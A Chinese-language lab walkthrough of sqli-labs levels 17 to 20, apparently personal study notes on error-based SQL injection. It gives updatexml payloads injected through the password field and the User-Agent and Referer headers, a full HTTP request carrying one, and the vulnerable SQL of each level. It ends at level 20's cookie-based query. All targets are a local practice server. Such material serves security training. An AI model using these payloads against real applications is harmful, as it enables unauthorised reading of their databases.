sqli-labs闯关笔记-less-17-less20-报错型注入

less17

使用了get_magic_quotes_gpc name和password分开验证，而且在验证的时候对于name进行了过滤处理，将’进行了转义
首先我们要知道用户的名字是多少，然后才可以进行接下来的操作

1、查看当前数据库名，从报错信息中返回数据库名。

uname=admin &passwd=admin' and updatexml(1,concat(0x7e,(database())),1) #&submit=Submit

uname=admin &passwd=admin' and updatexml(1,concat(0x7e,(version())),1) #&submit=Submit

less18

less17中可能会更改密码，可以在sqli-labs首页重置数据库，或查看数据库中密码。

 输入admin、admin。登录失败显示ip地址，登录成功显示ip地址和User-Agent。

以下均为POST内容： 'and updatexml(1,concat(0x7e,(database()),0x7e),1) and ’1'= '1 注册登录再注入
1. 登录失败显示ip地址
2. 登录成功显示ip地址和User-Agent
3. $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
4. 分析后得知，需要进行闭合操作，两种方法：
（1） ' or updatexml(1,concat(0x7e,(database())),1) and '1'='1
（2）' or updatexml(1,concat(0x7e,(database())),1), '', '')#
然后再通过mysql注入语句进行操作即可！

 本例中username和password位置都不存在注入点，都被转义了。

uname=admin'&passwd=admin'&submit=Submit

 SQL语句如下：

SELECT users.username, users.password FROM users WHERE users.username='admin' and users.password='admin' ORDER BY users.id DESC LIMIT 0,1
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36', '127.0.0.1', 'admin')

注入点改成了user-agent中。在user-agent后面加入报错注入语句： ' or updatexml(1,concat(0x7e,(database())),1) and '1'='1

POST /sqli-labs/Less-18/ HTTP/1.1
Host: 127.0.0.1:8001
Content-Length: 38
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8001
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 ' or updatexml(1,concat(0x7e,(database())),1) and '1'='1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8001/sqli-labs/Less-18/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

uname=admin&passwd=admin&submit=Submit

 

或者用下面方式：

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36  ' or updatexml(1,concat(0x7e,(database())),1), '', '')#

less19

 把注入的位置改成refer。

INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('http://127.0.0.1:8001/sqli-labs/Less-19/', '127.0.0.1')

（1） ' or updatexml(1,concat(0x7e,(database())),1) and '1'='1
（2） ' or updatexml(1,concat(0x7e,(database())),1), '')#

Referer: http://127.0.0.1:8001/sqli-labs/Less-19/  ' or updatexml(1,concat(0x7e,(database())),1) and '1'='1

Referer: http://127.0.0.1:8001/sqli-labs/Less-19/ ' or updatexml(1,concat(0x7e,(database())),1), '')#

less20

注入的位置为cookie

$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";